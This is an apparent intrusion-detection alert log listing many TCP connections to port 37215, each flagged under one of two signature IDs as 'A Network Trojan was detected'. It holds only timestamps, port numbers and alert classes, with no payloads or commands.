          Timestamp:06/08/24-15:05:13.109279
          SID:2835222
          Source Port:48558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601393
          SID:2829579
          Source Port:55364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.263791
          SID:2829579
          Source Port:59718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855133
          SID:2835222
          Source Port:47766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.796282
          SID:2835222
          Source Port:49422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174143
          SID:2829579
          Source Port:40392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356669
          SID:2829579
          Source Port:32826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.350735
          SID:2829579
          Source Port:35096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.296871
          SID:2835222
          Source Port:50844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732073
          SID:2835222
          Source Port:49592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039475
          SID:2835222
          Source Port:36826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016925
          SID:2835222
          Source Port:38036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.408878
          SID:2829579
          Source Port:39098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782020
          SID:2829579
          Source Port:35040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238132
          SID:2829579
          Source Port:41686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406270
          SID:2829579
          Source Port:42144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038975
          SID:2835222
          Source Port:59372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.151436
          SID:2835222
          Source Port:39192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746143
          SID:2829579
          Source Port:60926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817200
          SID:2829579
          Source Port:58604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017670
          SID:2829579
          Source Port:44036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.233658
          SID:2835222
          Source Port:51162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.456060
          SID:2835222
          Source Port:48714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239087
          SID:2835222
          Source Port:48598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353552
          SID:2835222
          Source Port:55684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131245
          SID:2829579
          Source Port:44272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.175795
          SID:2835222
          Source Port:58098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600282
          SID:2829579
          Source Port:38768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173900
          SID:2835222
          Source Port:45690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353384
          SID:2835222
          Source Port:39972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017246
          SID:2835222
          Source Port:48606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.831165
          SID:2829579
          Source Port:34106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.603162
          SID:2829579
          Source Port:56398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108364
          SID:2835222
          Source Port:34378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.512176
          SID:2835222
          Source Port:45790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160846
          SID:2835222
          Source Port:51082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.257548
          SID:2829579
          Source Port:40534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115248
          SID:2835222
          Source Port:46904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.546577
          SID:2835222
          Source Port:33304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.180220
          SID:2829579
          Source Port:55758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018148
          SID:2829579
          Source Port:33366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.518001
          SID:2835222
          Source Port:53846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.819321
          SID:2835222
          Source Port:44814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.514008
          SID:2835222
          Source Port:56946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188664
          SID:2835222
          Source Port:49312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.510896
          SID:2829579
          Source Port:45792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.853175
          SID:2829579
          Source Port:57916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.846292
          SID:2829579
          Source Port:54862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128160
          SID:2829579
          Source Port:58036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108599
          SID:2829579
          Source Port:47328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782282
          SID:2835222
          Source Port:58942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.176374
          SID:2829579
          Source Port:59232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262331
          SID:2829579
          Source Port:42780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.512709
          SID:2829579
          Source Port:35036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.553081
          SID:2829579
          Source Port:35262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269222
          SID:2829579
          Source Port:51282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.160676
          SID:2835222
          Source Port:51988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549327
          SID:2829579
          Source Port:47608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743549
          SID:2829579
          Source Port:55716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.832445
          SID:2829579
          Source Port:35990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444489
          SID:2829579
          Source Port:38076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159966
          SID:2835222
          Source Port:42256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.515885
          SID:2835222
          Source Port:59800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509744
          SID:2829579
          Source Port:55706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354715
          SID:2835222
          Source Port:56804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446687
          SID:2835222
          Source Port:44366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.059177
          SID:2835222
          Source Port:40776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.394615
          SID:2829579
          Source Port:58342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274620
          SID:2829579
          Source Port:44616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173253
          SID:2835222
          Source Port:55280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107489
          SID:2835222
          Source Port:48274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174116
          SID:2829579
          Source Port:51440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174488
          SID:2835222
          Source Port:38730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.802512
          SID:2829579
          Source Port:54842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352648
          SID:2829579
          Source Port:36324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.257732
          SID:2829579
          Source Port:36748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463372
          SID:2829579
          Source Port:38516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019490
          SID:2835222
          Source Port:59954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.043766
          SID:2829579
          Source Port:35994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884392
          SID:2835222
          Source Port:57782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274208
          SID:2829579
          Source Port:38830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461072
          SID:2835222
          Source Port:34376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.076784
          SID:2835222
          Source Port:34640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378414
          SID:2835222
          Source Port:37968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466180
          SID:2835222
          Source Port:39472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306717
          SID:2829579
          Source Port:53866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854993
          SID:2835222
          Source Port:57626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.412726
          SID:2835222
          Source Port:36102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352672
          SID:2835222
          Source Port:60986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787616
          SID:2835222
          Source Port:50926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789629
          SID:2829579
          Source Port:35222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.822835
          SID:2829579
          Source Port:37332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039384
          SID:2829579
          Source Port:43442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239821
          SID:2829579
          Source Port:35184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352574
          SID:2829579
          Source Port:50324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356920
          SID:2835222
          Source Port:43570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.843856
          SID:2835222
          Source Port:57798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.858307
          SID:2835222
          Source Port:33160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.893831
          SID:2829579
          Source Port:58432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179666
          SID:2835222
          Source Port:40910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240597
          SID:2829579
          Source Port:33254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.129609
          SID:2835222
          Source Port:34106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.275428
          SID:2829579
          Source Port:41042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.601419
          SID:2829579
          Source Port:47636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732095
          SID:2829579
          Source Port:38354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.144932
          SID:2835222
          Source Port:59526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179052
          SID:2829579
          Source Port:58974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.602112
          SID:2829579
          Source Port:54932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787769
          SID:2835222
          Source Port:44034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787984
          SID:2829579
          Source Port:41358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789406
          SID:2829579
          Source Port:53938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.798889
          SID:2835222
          Source Port:41420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274090
          SID:2835222
          Source Port:39292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512465
          SID:2835222
          Source Port:46658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017200
          SID:2835222
          Source Port:38788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551103
          SID:2829579
          Source Port:47010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.158880
          SID:2829579
          Source Port:39826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160870
          SID:2835222
          Source Port:45046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789130
          SID:2835222
          Source Port:32834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.166531
          SID:2835222
          Source Port:52168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178364
          SID:2835222
          Source Port:39972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.741031
          SID:2829579
          Source Port:47282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.853764
          SID:2829579
          Source Port:56490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671659
          SID:2835222
          Source Port:35378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405151
          SID:2835222
          Source Port:39778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354222
          SID:2835222
          Source Port:38706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793180
          SID:2835222
          Source Port:42706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109394
          SID:2829579
          Source Port:56594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.514607
          SID:2835222
          Source Port:39942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600154
          SID:2835222
          Source Port:37716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.151227
          SID:2829579
          Source Port:40294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108702
          SID:2835222
          Source Port:59794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857003
          SID:2829579
          Source Port:56032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.805110
          SID:2835222
          Source Port:52054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135923
          SID:2835222
          Source Port:54662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787427
          SID:2829579
          Source Port:35926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.176254
          SID:2835222
          Source Port:34124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551328
          SID:2829579
          Source Port:50034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.464733
          SID:2835222
          Source Port:52118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704973
          SID:2829579
          Source Port:34398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179250
          SID:2829579
          Source Port:38824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894417
          SID:2835222
          Source Port:57824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.787955
          SID:2835222
          Source Port:43486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.545794
          SID:2829579
          Source Port:35070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353548
          SID:2829579
          Source Port:47160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.082997
          SID:2835222
          Source Port:44244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.087309
          SID:2835222
          Source Port:37060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107357
          SID:2829579
          Source Port:59888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160469
          SID:2829579
          Source Port:58110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793495
          SID:2835222
          Source Port:44928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854262
          SID:2835222
          Source Port:53904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039585
          SID:2835222
          Source Port:58848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.408855
          SID:2829579
          Source Port:34902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462298
          SID:2835222
          Source Port:48532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.819193
          SID:2835222
          Source Port:57638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.514261
          SID:2829579
          Source Port:53074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463838
          SID:2835222
          Source Port:50854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152778
          SID:2829579
          Source Port:46654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159612
          SID:2829579
          Source Port:50630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356651
          SID:2835222
          Source Port:49454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705472
          SID:2835222
          Source Port:54142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099524
          SID:2829579
          Source Port:35330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743204
          SID:2829579
          Source Port:56058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112260
          SID:2829579
          Source Port:58262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.794917
          SID:2835222
          Source Port:56814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897222
          SID:2829579
          Source Port:51432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152847
          SID:2835222
          Source Port:36956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542843
          SID:2829579
          Source Port:60342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468224
          SID:2829579
          Source Port:43046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352973
          SID:2835222
          Source Port:56136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.191653
          SID:2829579
          Source Port:47652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.846245
          SID:2835222
          Source Port:39594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896051
          SID:2835222
          Source Port:37338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601942
          SID:2835222
          Source Port:49254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704400
          SID:2829579
          Source Port:58798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854970
          SID:2829579
          Source Port:55046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732548
          SID:2835222
          Source Port:55872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.813056
          SID:2835222
          Source Port:35186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131455
          SID:2829579
          Source Port:56286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808690
          SID:2835222
          Source Port:32878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.040300
          SID:2829579
          Source Port:49498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238421
          SID:2835222
          Source Port:58044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.798341
          SID:2829579
          Source Port:46090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.164294
          SID:2829579
          Source Port:41188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.191433
          SID:2835222
          Source Port:44232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739900
          SID:2835222
          Source Port:35330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108086
          SID:2829579
          Source Port:55668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128053
          SID:2829579
          Source Port:36332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.165670
          SID:2835222
          Source Port:37212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733805
          SID:2835222
          Source Port:47980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177526
          SID:2835222
          Source Port:48792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706535
          SID:2829579
          Source Port:36956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.800248
          SID:2829579
          Source Port:49296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108151
          SID:2829579
          Source Port:60452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356169
          SID:2835222
          Source Port:45790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099295
          SID:2829579
          Source Port:48900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240671
          SID:2835222
          Source Port:44058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.162955
